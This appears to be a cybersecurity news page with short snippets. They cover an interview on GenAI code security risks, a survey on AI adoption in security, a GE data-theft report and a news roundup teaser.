In an exclusive interview with Cyber Intelligence, Gadi Bashvitz, CEO of cybersecurity testing firm, Bright Security warns of the security challenges facing organizations in the wake of widespread adoption of GenAI. Cyber Intelligence: Are there any specific dangers of which companies using GenAI to generate new code should be particularly aware? Gadi Bashvitz: There are multiple considerations here. On one hand, any solution developed leveraging LLMs is prone to LLM-specific vulnerabilities such as Insecure Output Handling and Broken Access Control and it is critical to make sure organizations are aware and can detect such vulnerabilities before releasing LLM-based solutions.
According to a report released by the Cloud Security Alliance and Google Cloud, 55% of all organizations plan to use AI to boost security by 2025. The "State of AI and Security Survey Report," also found that 67% of organizations already tested and are pleased with AI-backed security capabilities.
General Electric (GE) recognized the data theft from threat actor IntelBroker pertaining to a project involving the Defence Advanced Research Projects Agency, sparking national security concerns. The GE Spokesperson commented on the data theft, saying they are thoroughly investigating the claims, will work on further protecting the integrity of their security systems, and that business operations will not be affected.
In this roundup; experts warn of new 'polyglot' malware, AI neutralizes trillions of IT events, and Northern Ireland data breach suspects have been arrested.
Sign in to your account